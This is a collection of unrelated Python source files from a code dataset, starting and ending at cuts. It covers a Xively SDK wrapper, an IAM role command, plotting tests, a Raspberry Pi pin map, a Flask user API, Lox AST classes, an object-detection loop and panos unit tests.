        Set the value of the Domain input for this Choreo. ((optional, string) The domain of the location, i.e. physical or virtual. Leave empty to keep existing Domain. Type "BLANK" to clear existing Domain. Ex: "physical".)
        """
        super(WriteLocationDataInputSet, self)._set_input('Domain', value)
    def set_Elevation(self, value):
        """
        Set the value of the Elevation input for this Choreo. ((optional, decimal) Elevation in meters. Leave empty to keep previously existing Elevation. Type "BLANK" to clear existing Elevation. Ex: 20.5.)
        """
        super(WriteLocationDataInputSet, self)._set_input('Elevation', value)
    def set_FeedID(self, value):
        """
        Set the value of the FeedID input for this Choreo. ((required, integer) The ID for the feed that you would like to update.)
        """
        super(WriteLocationDataInputSet, self)._set_input('FeedID', value)
    def set_Latitude(self, value):
        """
        Set the value of the Latitude input for this Choreo. ((optional, decimal) Latitude coordinates. Leave empty to keep previously existing Latitude. Type "BLANK" to clear existing Latitude. Ex: 40.728194.)
        """
        super(WriteLocationDataInputSet, self)._set_input('Latitude', value)
    def set_Longitude(self, value):
        """
        Set the value of the Longitude input for this Choreo. ((optional, decimal) Longitude coordinates. Leave empty to keep previously existing Location. Type "BLANK" to clear existing settings. Ex: -73.957316.)
        """
        super(WriteLocationDataInputSet, self)._set_input('Longitude', value)
    def set_Name(self, value):
        """
        Set the value of the Name input for this Choreo. ((optional, string) Name of Location. Leave empty to keep existing Location. Type "BLANK" to clear existing settings. Ex.: "My Fitbit Tracker".)
        """
        super(WriteLocationDataInputSet, self)._set_input('Name', value)
class WriteLocationDataResultSet(ResultSet):
    """
    A ResultSet with methods tailored to the values returned by the WriteLocationData Choreo.
    The ResultSet object is used to retrieve the results of a Choreo execution.
    """

    def getJSONFromString(self, str):
        # Parse a raw JSON response string into Python objects.
        # NOTE(review): the parameter name shadows the builtin ``str``; kept
        # as-is because renaming it would break keyword callers of this
        # autogenerated SDK method.
        return json.loads(str)

    def get_ResponseStatusCode(self):
        """
        Retrieve the value for the "ResponseStatusCode" output from this Choreo execution. ((integer) The response status code returned from Xively. For a successful feed location update, the code should be 200.)
        """
        return self._output.get('ResponseStatusCode', None)
class WriteLocationDataChoreographyExecution(ChoreographyExecution):
    """Execution wrapper that materialises WriteLocationData results."""

    def _make_result_set(self, response, path):
        # Wrap the raw Choreo response in the Choreo-specific result set.
        result_set = WriteLocationDataResultSet(response, path)
        return result_set
| StarcoderdataPython |
9786894 | # Copyright 2014 Eucalyptus Systems, Inc.
#
# Redistribution and use of this software in source and binary forms,
# with or without modification, are permitted provided that the following
# conditions are met:
#
# Redistributions of source code must retain the above copyright notice,
# this list of conditions and the following disclaimer.
#
# Redistributions in binary form must reproduce the above copyright
# notice, this list of conditions and the following disclaimer in the
# documentation and/or other materials provided with the distribution.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
# A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT
# OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
# SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT
# LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
# DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
# THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
import json
import urllib
from requestbuilder import Arg, MutuallyExclusiveArgList
from euca2ools.commands.argtypes import file_contents
from euca2ools.commands.iam import IAMRequest, AS_ACCOUNT
class CreateRole(IAMRequest):
    """euca2ools request that creates a new IAM role.

    The role's trust policy may be supplied verbatim from a file (-f) or
    synthesized for a single service principal (-s); exactly one of the two
    is required.  Python 2 module: ``print`` statements and
    ``urllib.unquote`` below are intentional.
    """

    DESCRIPTION = 'Create a new role'
    ARGS = [Arg('-r', '--role-name', dest='RoleName', metavar='ROLE',
                required=True, help='name of the new role (required)'),
            Arg('-p', '--path', dest='Path',
                help='path for the new role (default: "/")'),
            # .required() on the MutuallyExclusiveArgList enforces that
            # exactly one of -f / -s is supplied.
            MutuallyExclusiveArgList(
                Arg('-f', dest='AssumeRolePolicyDocument', metavar='FILE',
                    type=file_contents,
                    help='file containing the policy for the new role'),
                Arg('-s', '--service_', route_to=None, help='''service to allow
                    access to the role (e.g. ec2.amazonaws.com)'''))
            .required(),
            Arg('-v', '--verbose', action='store_true', route_to=None,
                help="print the new role's ARN, GUID, and policy"),
            AS_ACCOUNT]

    def preprocess(self):
        # When -s is given, build the sts:AssumeRole trust policy for that
        # service principal instead of reading one from a file.
        if self.args.get('service_'):
            statement = {'Effect': 'Allow',
                         'Principal': {'Service': [self.args['service_']]},
                         'Action': ['sts:AssumeRole']}
            policy = {'Version': '2008-10-17',
                      'Statement': [statement]}
            self.params['AssumeRolePolicyDocument'] = json.dumps(policy)

    def print_result(self, result):
        # With -v, echo the new role's ARN, id, and (URL-decoded) policy.
        if self.args.get('verbose'):
            print result.get('Role', {}).get('Arn')
            print result.get('Role', {}).get('RoleId')
            print urllib.unquote(result.get('Role', {})
                                 .get('AssumeRolePolicyDocument'))
| StarcoderdataPython |
68254 | <filename>test/gui/mpl_figuremaker.py
"""A set of simple tests of the MPL FigureMaker classes."""
import numpy as np
from plottr import QtWidgets
from plottr.plot.base import ComplexRepresentation
from plottr.plot.mpl.autoplot import FigureMaker, PlotType
from plottr.plot.mpl.widgets import figureDialog
def test_multiple_line_plots(single_panel: bool = False):
    """Plot cos(x), cos^2(x), and cos^3(x) as 1d traces.

    With ``single_panel`` all traces share one panel; otherwise each trace
    is drawn in its own panel.
    """
    fig, win = figureDialog()
    xs = np.linspace(0, 10, 101)
    base = np.cos(xs)
    with FigureMaker(fig) as fm:
        if single_panel:
            fm.plotType = PlotType.multitraces
        else:
            fm.plotType = PlotType.singletraces
        for power, label in ((1, r'$\cos(x)$'),
                             (2, r'$\cos^2(x)$'),
                             (3, r'$\cos^3(x)$')):
            fm.addData(xs, base ** power, labels=['x', label])
    return win
def test_complex_line_plots(single_panel: bool = False,
                            mag_and_phase_format: bool = False):
    """Plot exp(-ix) and its complex conjugate as complex-valued traces."""
    fig, win = figureDialog()
    xs = np.linspace(0, 10, 101)
    trace = np.exp(-1j * xs)
    with FigureMaker(fig) as fm:
        if mag_and_phase_format:
            # Render complex data as magnitude + phase instead of Re/Im.
            fm.complexRepresentation = ComplexRepresentation.magAndPhase
        fm.plotType = PlotType.multitraces if single_panel else PlotType.singletraces
        fm.addData(xs, trace, labels=['x', r'$\exp(-ix)$'])
        fm.addData(xs, np.conjugate(trace), labels=['x', r'$\exp(ix)$'])
    return win
def main():
    """Create the demo windows, show them, and run the Qt event loop."""
    app = QtWidgets.QApplication([])
    windows = [
        test_multiple_line_plots(),
        test_multiple_line_plots(single_panel=True),
        # Disabled demos, kept for manual testing:
        # test_complex_line_plots(),
        # test_complex_line_plots(single_panel=True),
        # test_complex_line_plots(mag_and_phase_format=True),
        test_complex_line_plots(single_panel=True, mag_and_phase_format=True),
    ]
    for window in windows:
        window.show()
    return app.exec_()
# Allow running this demo module directly as a script.
if __name__ == '__main__':
    main()
| StarcoderdataPython |
189624 | from collections import namedtuple
from itertools import chain
class RowNames:
    """Identifiers for the two physical rows of the GPIO header."""

    # Row nearest the board edge.
    OUTER = "outer"
    # Row nearest the board centre.
    INNER = "inner"
class PinTypes:
    """Category labels attached to each header pin."""

    GPIO = "gpio"        # general-purpose I/O
    POWER_5V = "5V+"     # 5 V supply
    POWER_3V3 = "3V3+"   # 3.3 V supply
    GND = "GND"          # ground
    I2C = "i2c"          # I2C bus pins
    EEPROM = "EEPROM"    # HAT ID EEPROM pins
# A single header pin: its coordinates, GPIO id (None for power/ground pins),
# pin category, and optional special-function label.
Pin = namedtuple("Pin", ["coords", "id", "pin_type", "special_func"])
# Position of a pin: the row it belongs to and its pair index within the row.
PinCoords = namedtuple("PinCoords", ["row_name", "pin_pair_num"])
# One complete row of header pins.
Row = namedtuple("Row", ["row_name", "pins"])
# A vertical pair of pins; not referenced elsewhere in this module.
Column = namedtuple("Column", ["column_num", "outer_pin", "inner_pin"])
class RPi3Pins:
    """Lookup tables for the Raspberry Pi 3 40-pin GPIO header.

    The header is modelled as two rows of 20 pins: the OUTER row and the
    INNER row, indexed by ``pin_pair_num`` 0..19.  Each entry records the
    BCM GPIO id (``None`` for power/ground pins), the pin type, and an
    optional special-function label.  The data tables below replace the
    original hand-expanded ``Pin(...)`` literals; ``outer_row()`` and
    ``inner_row()`` return exactly the same ``Row`` structures as before.
    """

    # (BCM id, pin type, special function) per pin-pair index 0..19.
    _OUTER_SPEC = [
        (None, PinTypes.POWER_5V, None),
        (None, PinTypes.POWER_5V, None),
        (None, PinTypes.GND, None),
        (14, PinTypes.GPIO, "TXD0"),
        (15, PinTypes.GPIO, "RXD0"),
        (18, PinTypes.GPIO, "GPIO_GEN_1"),
        (None, PinTypes.GND, "GND"),
        (23, PinTypes.GPIO, "GPIO_GEN_4"),
        (24, PinTypes.GPIO, "GPIO_GEN_5"),
        (None, PinTypes.GND, "GND"),
        (25, PinTypes.GPIO, "GPIO_GEN_6"),
        (8, PinTypes.GPIO, "SPI_CE0_N"),
        (7, PinTypes.GPIO, "SPI_CE1_N"),
        # BUG FIX: ID_SC is BCM 1; it previously duplicated ID_SD's id 0.
        (1, PinTypes.EEPROM, "I2C EEPROM ID_SC"),
        (None, PinTypes.GND, "GND"),
        (12, PinTypes.GPIO, None),
        (None, PinTypes.GND, "GND"),
        (16, PinTypes.GPIO, None),
        (20, PinTypes.GPIO, None),
        (21, PinTypes.GPIO, None),
    ]

    _INNER_SPEC = [
        (None, PinTypes.POWER_3V3, None),
        (2, PinTypes.GPIO, None),
        # BUG FIX: BCM 3 (SCL1) is a GPIO pin; it was mislabelled GND
        # (every real ground entry in these tables has id=None).
        (3, PinTypes.GPIO, None),
        (4, PinTypes.GPIO, "GPIO_GCLK"),
        (None, PinTypes.GND, "GND"),
        (17, PinTypes.GPIO, "GPIO_GEN_0"),
        (27, PinTypes.GPIO, "GPIO_GEN2"),
        (22, PinTypes.GPIO, "GPIO_GEN_3"),
        (None, PinTypes.POWER_3V3, "3V3"),
        (10, PinTypes.GPIO, "SPI_MOSI"),
        (9, PinTypes.GPIO, "SPI_MISO"),
        (11, PinTypes.GPIO, "SPI_CLK"),
        (None, PinTypes.GND, "GND"),
        (0, PinTypes.EEPROM, "I2C EEPROM ID_SD"),
        (5, PinTypes.GPIO, None),
        (6, PinTypes.GPIO, None),
        (13, PinTypes.GPIO, None),
        (19, PinTypes.GPIO, None),
        (26, PinTypes.GPIO, None),
        (None, PinTypes.GND, "GND"),
    ]

    def __init__(self):
        # All data is class-level; instances exist only for convenience.
        pass

    @staticmethod
    def _build_row(row_name, spec):
        """Materialise a Row of Pin namedtuples from a compact spec table."""
        pins = [
            Pin(
                coords=PinCoords(row_name=row_name, pin_pair_num=index),
                id=bcm_id,
                pin_type=pin_type,
                special_func=special_func,
            )
            for index, (bcm_id, pin_type, special_func) in enumerate(spec)
        ]
        return Row(row_name=row_name, pins=pins)

    @staticmethod
    def get_pins_by_type(pin_type):
        """Return every pin of *pin_type*, outer row first, then inner."""
        all_pins = chain.from_iterable([
            RPi3Pins.outer_row().pins,
            RPi3Pins.inner_row().pins,
        ])
        return [pin for pin in all_pins if pin.pin_type == pin_type]

    @staticmethod
    def get_pin_at(inner_or_outer, pair_index):
        """Return the pin at *pair_index* in the named row.

        Returns ``None`` for an unrecognised row name and raises
        ``IndexError`` for an out-of-range index (both unchanged from the
        original behaviour).
        """
        if inner_or_outer == RowNames.OUTER:
            return RPi3Pins.outer_row().pins[pair_index]
        if inner_or_outer == RowNames.INNER:
            return RPi3Pins.inner_row().pins[pair_index]

    @staticmethod
    def outer_row():
        """Row of the 20 outer-row header pins."""
        return RPi3Pins._build_row(RowNames.OUTER, RPi3Pins._OUTER_SPEC)

    @staticmethod
    def inner_row():
        """Row of the 20 inner-row header pins."""
        return RPi3Pins._build_row(RowNames.INNER, RPi3Pins._INNER_SPEC)
def print_pins():
    """Print an ASCII diagram of the header, power light at the top."""
    board = RPi3Pins()

    def _fmt(pin):
        # "[<id>: <type>]" plus "(<special function>)" when one is defined.
        if pin.special_func is None:
            return '[{}: {}]\t\t\t'.format(pin.id, pin.pin_type)
        return '[{}: {}({})]\t\t'.format(pin.id, pin.pin_type, pin.special_func)

    print(' Power light ^^ ')
    for inner, outer in zip(board.inner_row().pins, board.outer_row().pins):
        print(inner.coords.pin_pair_num, '\t', _fmt(inner), _fmt(outer))
    print()
    print(' USB Connectors ')
# Print the ASCII pinout when executed as a script.
if __name__ == '__main__':
    print_pins()
| StarcoderdataPython |
165995 | <gh_stars>0
from flask_restplus import Namespace, Resource, fields
from restApi.models.users import User
from restApi.helpers.user_helper import UserParser
from restApi.helpers.login_helper import LoginParser
import jwt
from instance.config import Config
from werkzeug.security import check_password_hash, generate_password_hash
from flask import request, jsonify
import datetime
from restApi.resources.auth import token_required
# Token blacklist placeholder for the (currently disabled) logout flow.
blacklist = set()
# Shared in-memory user store used by every resource below.
User_object = User()
user_api = Namespace("Users", description="")
# Swagger request model for registration payloads.
new_user = user_api.model('Users', {'email': fields.String('<EMAIL>'),
                                    'username': fields.String('test_user'),
                                    'password': fields.String('<PASSWORD>'),
                                    'confirm_password': fields.String('<PASSWORD>')
                                    })
# Swagger request model for login payloads.
user_login = user_api.model('Login', {'email': fields.String('<EMAIL>'),
                                      'password': fields.String('<PASSWORD>')})
class Users(Resource):
    """Collection endpoint: list all users and register new ones."""

    @token_required
    @user_api.doc(security='apikey')
    def get(self):
        """Return every registered user (requires a valid token)."""
        response = User_object.get_all_users()
        return response, 200

    @user_api.expect(new_user)
    def post(self):
        """Register a new user after validating the request payload."""
        data = UserParser.parser.parse_args()
        # Validate before doing any work.
        # BUG FIX: this path previously returned an implicit HTTP 200.
        for value in data.values():
            if value == "":
                return "Fields must not be blank", 400
        # Local was previously named ``new_user``, shadowing the
        # module-level request model of the same name.
        existing_user = User_object.get_single_user(data['email'])
        if existing_user:
            return "user with email: {} already exists".format(data["email"]), 400
        # Compare the two plaintext inputs directly instead of hashing one
        # and round-tripping it through check_password_hash (equivalent,
        # but clearer and cheaper).
        if data['password'] == data['confirm_password']:
            hashed_pass = generate_password_hash(data['password'])
            User_object.create_user(data['email'], data['username'], hashed_pass)
            return "User registered successfully", 201
        return "passwords do not match", 401
class Update(Resource):
    """Item endpoint: update an existing user identified by email."""

    @user_api.expect(new_user)
    @token_required
    @user_api.doc(security='apikey')
    def put(self, email):
        """Update the user stored under ``email`` (requires a valid token)."""
        data = UserParser.parser.parse_args()
        for value in data.values():
            if value == "":
                return "Fields must not be blank", 400
        if not User_object.get_single_user(email):
            # BUG FIX: previously returned an implicit HTTP 200 for a
            # missing user.
            return "user does not exist", 404
        if data['password'] != data['confirm_password']:
            # BUG FIX: previously an implicit 200; 401 matches Users.post.
            return "passwords do not match", 401
        hashed_password = generate_password_hash(data['password'])
        # NOTE(review): the record is written under data['email'], not the
        # ``email`` path parameter -- confirm this rename flow is intended.
        User_object.update_user(data['email'], data['username'], hashed_password)
        return "User updated successfully", 200
class LogIn(Resource):
    """Authenticates a user and issues a short-lived (1 minute) JWT."""

    @user_api.expect(user_login)
    def post(self):
        # Require a JSON body before parsing credentials.
        # NOTE(review): returning a jsonify() Response from a flask-restplus
        # Resource bypasses its marshalling -- confirm this is intended.
        if not request.is_json:
            return jsonify({"msg": "Missing JSON in request"}), 400
        data = LoginParser.parser.parse_args()
        email = str(data['email'])
        password = str(data['password'])
        if email in User_object.users:
            if check_password_hash(User_object.users[email]['password'], password):
                # Token expires one minute after issue; signed with the app
                # secret.  jwt.encode returns bytes here, hence .decode().
                access_token = jwt.encode(
                    {"email": email, "exp": datetime.datetime.utcnow() + datetime.timedelta(minutes=1)}, Config.SECRET)
                return {"access_token": access_token.decode('utf-8')}, 200
            return {"msg": "Invalid email or password"}, 401
        return "user does not exist", 400
# Disabled logout endpoint, kept for when token blacklisting is wired up.
# class LogOut(Resource):
#     @token_required
#     def post(self):
#         jti = get_raw_jwt()['jti']
#         blacklist.add(jti)
#         return {"msg": "Successfully logged out"}, 200

# Route registration for this namespace.
user_api.add_resource(Users, '/users')
user_api.add_resource(Update, '/users/<string:email>')
user_api.add_resource(LogIn, '/users/login')
# user_api.add_resource(LogOut, '/users/logout')
| StarcoderdataPython |
3332479 | <gh_stars>1-10
# THIS FILE HAS BEEN AUTOGENERATED
from __future__ import annotations
import typing as t
from abc import ABC, abstractmethod
import attr
from pylox.protocols.visitor import VisitorProtocol
from pylox.tokens import LITERAL_T, Token
class Expr(ABC):  # pragma: no cover
    """Abstract base for every expression node of the Lox AST."""

    pass

    @abstractmethod
    def accept(self, visitor: VisitorProtocol) -> t.Any:
        # Visitor-pattern hook: concrete nodes dispatch to visit_<ClassName>.
        return NotImplemented
# --- Concrete expression nodes (autogenerated) -------------------------------
# Each node is an attrs class: slots=True keeps instances compact, and
# eq=False preserves the default identity-based equality/hashing.  Every
# ``accept`` dispatches to the visitor method named after the class.
@attr.s(slots=True, eq=False)
class Assign(Expr):
    name: Token = attr.ib()
    value: Expr = attr.ib()

    def accept(self, visitor: VisitorProtocol) -> t.Any:
        return visitor.visit_Assign(self)


@attr.s(slots=True, eq=False)
class Binary(Expr):
    expr_left: Expr = attr.ib()
    token_operator: Token = attr.ib()
    expr_right: Expr = attr.ib()

    def accept(self, visitor: VisitorProtocol) -> t.Any:
        return visitor.visit_Binary(self)


@attr.s(slots=True, eq=False)
class Call(Expr):
    callee: Expr = attr.ib()
    closing_paren: Token = attr.ib()
    arguments: list[Expr] = attr.ib()

    def accept(self, visitor: VisitorProtocol) -> t.Any:
        return visitor.visit_Call(self)


@attr.s(slots=True, eq=False)
class Get(Expr):
    object_: Expr = attr.ib()
    name: Token = attr.ib()

    def accept(self, visitor: VisitorProtocol) -> t.Any:
        return visitor.visit_Get(self)


@attr.s(slots=True, eq=False)
class Grouping(Expr):
    expr_expression: Expr = attr.ib()

    def accept(self, visitor: VisitorProtocol) -> t.Any:
        return visitor.visit_Grouping(self)


@attr.s(slots=True, eq=False)
class Literal(Expr):
    object_value: LITERAL_T = attr.ib()

    def accept(self, visitor: VisitorProtocol) -> t.Any:
        return visitor.visit_Literal(self)


@attr.s(slots=True, eq=False)
class Logical(Expr):
    expr_left: Expr = attr.ib()
    token_operator: Token = attr.ib()
    expr_right: Expr = attr.ib()

    def accept(self, visitor: VisitorProtocol) -> t.Any:
        return visitor.visit_Logical(self)


@attr.s(slots=True, eq=False)
class Set(Expr):
    object_: Expr = attr.ib()
    name: Token = attr.ib()
    value: Expr = attr.ib()

    def accept(self, visitor: VisitorProtocol) -> t.Any:
        return visitor.visit_Set(self)


@attr.s(slots=True, eq=False)
class Super(Expr):
    keyword: Token = attr.ib()
    method: Token = attr.ib()

    def accept(self, visitor: VisitorProtocol) -> t.Any:
        return visitor.visit_Super(self)


@attr.s(slots=True, eq=False)
class This(Expr):
    keyword: Token = attr.ib()

    def accept(self, visitor: VisitorProtocol) -> t.Any:
        return visitor.visit_This(self)


@attr.s(slots=True, eq=False)
class Unary(Expr):
    token_operator: Token = attr.ib()
    expr_right: Expr = attr.ib()

    def accept(self, visitor: VisitorProtocol) -> t.Any:
        return visitor.visit_Unary(self)


@attr.s(slots=True, eq=False)
class Variable(Expr):
    name: Token = attr.ib()

    def accept(self, visitor: VisitorProtocol) -> t.Any:
        return visitor.visit_Variable(self)
class Stmt(ABC):  # pragma: no cover
    """Abstract base for every statement node of the Lox AST."""

    pass

    @abstractmethod
    def accept(self, visitor: VisitorProtocol) -> t.Any:
        # Visitor-pattern hook: concrete nodes dispatch to visit_<ClassName>.
        return NotImplemented
# --- Concrete statement nodes (autogenerated) --------------------------------
# Same pattern as the expression nodes above: attrs classes with slots,
# identity-based equality, and a visitor ``accept`` per class.
@attr.s(slots=True, eq=False)
class Block(Stmt):
    statements: list[Stmt] = attr.ib()

    def accept(self, visitor: VisitorProtocol) -> t.Any:
        return visitor.visit_Block(self)


@attr.s(slots=True, eq=False)
class Class(Stmt):
    name: Token = attr.ib()
    superclass: t.Optional[Variable] = attr.ib()
    methods: list[Function] = attr.ib()

    def accept(self, visitor: VisitorProtocol) -> t.Any:
        return visitor.visit_Class(self)


@attr.s(slots=True, eq=False)
class Expression(Stmt):
    expr_expression: Expr = attr.ib()

    def accept(self, visitor: VisitorProtocol) -> t.Any:
        return visitor.visit_Expression(self)


@attr.s(slots=True, eq=False)
class Function(Stmt):
    name: Token = attr.ib()
    params: list[Token] = attr.ib()
    body: list[Stmt] = attr.ib()

    def accept(self, visitor: VisitorProtocol) -> t.Any:
        return visitor.visit_Function(self)


@attr.s(slots=True, eq=False)
class If(Stmt):
    condition: Expr = attr.ib()
    then_branch: Stmt = attr.ib()
    else_branch: t.Optional[Stmt] = attr.ib()

    def accept(self, visitor: VisitorProtocol) -> t.Any:
        return visitor.visit_If(self)


@attr.s(slots=True, eq=False)
class Var(Stmt):
    name: Token = attr.ib()
    initializer: t.Optional[Expr] = attr.ib()

    def accept(self, visitor: VisitorProtocol) -> t.Any:
        return visitor.visit_Var(self)


@attr.s(slots=True, eq=False)
class Return(Stmt):
    keyword: Token = attr.ib()
    value: t.Optional[Expr] = attr.ib()

    def accept(self, visitor: VisitorProtocol) -> t.Any:
        return visitor.visit_Return(self)


@attr.s(slots=True, eq=False)
class Print(Stmt):
    expr_expression: Expr = attr.ib()

    def accept(self, visitor: VisitorProtocol) -> t.Any:
        return visitor.visit_Print(self)


@attr.s(slots=True, eq=False)
class While(Stmt):
    condition: Expr = attr.ib()
    body: Stmt = attr.ib()

    def accept(self, visitor: VisitorProtocol) -> t.Any:
        return visitor.visit_While(self)


@attr.s(slots=True, eq=False)
class Break(Stmt):
    keyword: Token = attr.ib()

    def accept(self, visitor: VisitorProtocol) -> t.Any:
        return visitor.visit_Break(self)


@attr.s(slots=True, eq=False)
class Continue(Stmt):
    keyword: Token = attr.ib()

    def accept(self, visitor: VisitorProtocol) -> t.Any:
        return visitor.visit_Continue(self)
| StarcoderdataPython |
4974216 | # Author : <NAME> (<EMAIL>)
# Modified From API
# https://github.com/wagonhelm/TF_ObjectDetection_API/blob/master/ChessObjectDetection.ipynb
import skimage
import numpy as np
from skimage import io, transform
import os
import shutil
import glob
import pandas as pd
import xml.etree.ElementTree as ET
import tensorflow as tf
from collections import defaultdict
from io import StringIO
from matplotlib import pyplot as plt
from PIL import Image
import urllib.request
import urllib.error
import cv2
import scipy.misc
from scipy.ndimage import imread
from utils.app_utils import FPS, WebcamVideoStream
from utils import label_map_util
from utils import visualization_utils as vis_util
# Filesystem layout for training data and labels (relative to the CWD).
root = os.getcwd()
imagePath = os.path.join(root, 'fighters')
labelsPath = os.path.join(root, 'labels')
linksPath = os.path.join(imagePath, 'imageLinks')
trainPath = os.path.join(imagePath, 'train')
testPath = os.path.join(imagePath, 'test')

# Path to frozen detection graph. This is the actual model that is used for the object detection.
PATH_TO_CKPT = 'object_detection_graph/frozen_inference_graph.pb'

# List of the strings that is used to add correct label for each box.
PATH_TO_LABELS = 'data/label_map.pbtxt'
# Prefix for numbered input frames, e.g. "fighters 0001.jpg" (trailing space
# is intentional).
PATH_TO_IMAGES = 'fighters/fighter/fighters '
NUM_CLASSES = 2
# Load the frozen TensorFlow detection graph into memory.
detection_graph = tf.Graph()
with detection_graph.as_default():
    od_graph_def = tf.GraphDef()
    with tf.gfile.GFile(PATH_TO_CKPT, 'rb') as fid:
        serialized_graph = fid.read()
        od_graph_def.ParseFromString(serialized_graph)
        tf.import_graph_def(od_graph_def, name='')

# Map numeric class ids to human-readable category names for visualisation.
label_map = label_map_util.load_labelmap(PATH_TO_LABELS)
categories = label_map_util.convert_label_map_to_categories(label_map, max_num_classes=NUM_CLASSES, use_display_name=True)
category_index = label_map_util.create_category_index(categories)
def load_image_into_numpy_array(image):
    """Convert an RGB PIL-style image into an (H, W, 3) uint8 numpy array.

    ``image.size`` is (width, height); the returned array is indexed
    (row, column, channel), i.e. (height, width, 3).
    """
    width, height = image.size
    flat = np.array(image.getdata())
    return flat.reshape((height, width, 3)).astype(np.uint8)
# Modified From API
# https://github.com/tensorflow/models/blob/master/research/object_detection/object_detection_tutorial.ipynb
# Main loop: run the detector over numbered frames on disk, draw the
# detections, and display them until 'q' is pressed.
with detection_graph.as_default():
    with tf.Session(graph=detection_graph) as sess:
        # Definite input and output Tensors for detection_graph
        image_tensor = detection_graph.get_tensor_by_name('image_tensor:0')
        # Each box represents a part of the image where a particular object was detected.
        detection_boxes = detection_graph.get_tensor_by_name('detection_boxes:0')
        # Each score represent how level of confidence for each of the objects.
        # Score is shown on the result image, together with the class label.
        detection_scores = detection_graph.get_tensor_by_name('detection_scores:0')
        detection_classes = detection_graph.get_tensor_by_name('detection_classes:0')
        num_detections = detection_graph.get_tensor_by_name('num_detections:0')
        print(detection_classes)
        # src=0 --> /dev/video0. change src number according to your video node
        # NOTE(review): the webcam stream is started but never read or
        # stopped -- frames below come from numbered image files instead.
        video_capture = WebcamVideoStream(src=0,
                                          width=720,
                                          height=480).start()
        fps = FPS().start()
        i = 1
        while(True):
            # Read frame i from disk; filenames are zero-padded to 4 digits.
            # NOTE(review): i grows without bound, so this raises once the
            # numbered files run out; fps.stop() is never called either.
            frame = scipy.misc.imread(PATH_TO_IMAGES + str(i).zfill(4) + '.jpg', mode="RGB")
            # frame = cv2.imread(PATH_TO_IMAGES + str(i % 12 + 1).zfill(3) + '.jpg')
            # print(PATH_TO_IMAGES + str(i % 12 + 1) + '.jpg')
            # print(frame)
            # gray = cv2.cvtColor(img, cv2.COLOR_BGR2GRAY)
            # frame = video_capture.read()
            frame_rgb = cv2.cvtColor(frame, cv2.COLOR_BGR2RGB)
            image_np_expanded = np.expand_dims(frame_rgb, axis=0)
            # Actual detection.
            (boxes, scores, classes, num) = sess.run(
                [detection_boxes, detection_scores, detection_classes, num_detections],
                feed_dict={image_tensor: image_np_expanded})
            print(boxes)
            print(scores)
            print('***************** Visualization ************')
            # Visualization of the results of a detection.
            vis_util.visualize_boxes_and_labels_on_image_array(
                frame_rgb,
                np.squeeze(boxes),
                np.squeeze(classes).astype(np.int32),
                np.squeeze(scores),
                category_index,
                use_normalized_coordinates=True,
                line_thickness=2)
            output_rgb = cv2.cvtColor(frame_rgb, cv2.COLOR_RGB2BGR)
            cv2.imshow('Object Detection', output_rgb)
            fps.update()
            i = i + 1
            if cv2.waitKey(1) & 0xFF == ord('q'):
                break
            # input("Press Enter to continue...")
| StarcoderdataPython |
8189198 | <gh_stars>1-10
# Copyright (c) 2014, Palo Alto Networks
#
# Permission to use, copy, modify, and/or distribute this software for any
# purpose with or without fee is hereby granted, provided that the above
# copyright notice and this permission notice appear in all copies.
#
# THE SOFTWARE IS PROVIDED "AS IS" AND THE AUTHOR DISCLAIMS ALL WARRANTIES
# WITH REGARD TO THIS SOFTWARE INCLUDING ALL IMPLIED WARRANTIES OF
# MERCHANTABILITY AND FITNESS. IN NO EVENT SHALL THE AUTHOR BE LIABLE FOR
# ANY SPECIAL, DIRECT, INDIRECT, OR CONSEQUENTIAL DAMAGES OR ANY DAMAGES
# WHATSOEVER RESULTING FROM LOSS OF USE, DATA OR PROFITS, WHETHER IN AN
# ACTION OF CONTRACT, NEGLIGENCE OR OTHER TORTIOUS ACTION, ARISING OUT OF
# OR IN CONNECTION WITH THE USE OR PERFORMANCE OF THIS SOFTWARE.
try:
from unittest import mock
except ImportError:
import mock
import random
import unittest
import uuid
import xml.etree.ElementTree as ET
import pan.xapi
import panos.base as Base
import panos.errors as Err
# Fixture constants shared by the tests below.
OBJECT_NAME = "MyObjectName"
VSYS = "vsys1"


class TestPanObject(unittest.TestCase):
    """Unit tests for panos.base.PanObject's tree and xpath behaviour."""

    def setUp(self):
        # Fresh object under test for every case.
        self.obj = Base.PanObject(OBJECT_NAME)

    def verify_object(self, obj, **kwargs):
        # Assert name/children/parent against kwargs, defaulting to the
        # state of a freshly constructed PanObject.
        self.assertEqual(kwargs.get("name", None), obj.name)
        self.assertEqual(kwargs.get("children", []), obj.children)
        self.assertEqual(kwargs.get("parent", None), obj.parent)
    # --- construction, string form, and simple properties ---

    def test_create_with_name(self):
        self.obj = Base.PanObject(OBJECT_NAME)

        self.verify_object(self.obj, name=OBJECT_NAME)

    def test_create_without_name(self):
        self.obj = Base.PanObject()

        self.verify_object(self.obj)

    def test_str_of_object_with_name(self):
        self.assertEqual(OBJECT_NAME, str(self.obj))

    def test_str_of_object_without_name(self):
        self.obj = Base.PanObject()

        self.assertEqual("None", str(self.obj))

    def test_has_callable_variables(self):
        self.assertTrue(callable(self.obj.variables))

    def test_property_vsys_without_parent(self):
        self.assertIsNone(self.obj.vsys)

    def test_property_vsys_with_parent(self):
        # vsys is inherited from the parent when one is attached.
        self.obj.parent = mock.Mock(vsys=VSYS)

        self.assertEqual(VSYS, self.obj.vsys)

    def test_property_vsys_raises_error(self):
        # Direct assignment to vsys is rejected by PanObject.
        self.assertRaises(Err.PanDeviceError, setattr, self.obj, "vsys", "foo")

    def test_property_uid(self):
        expected = OBJECT_NAME

        ret_val = self.obj.uid

        self.assertEqual(expected, ret_val)
    # --- child management: add / insert / extend ---

    def test_add_without_children(self):
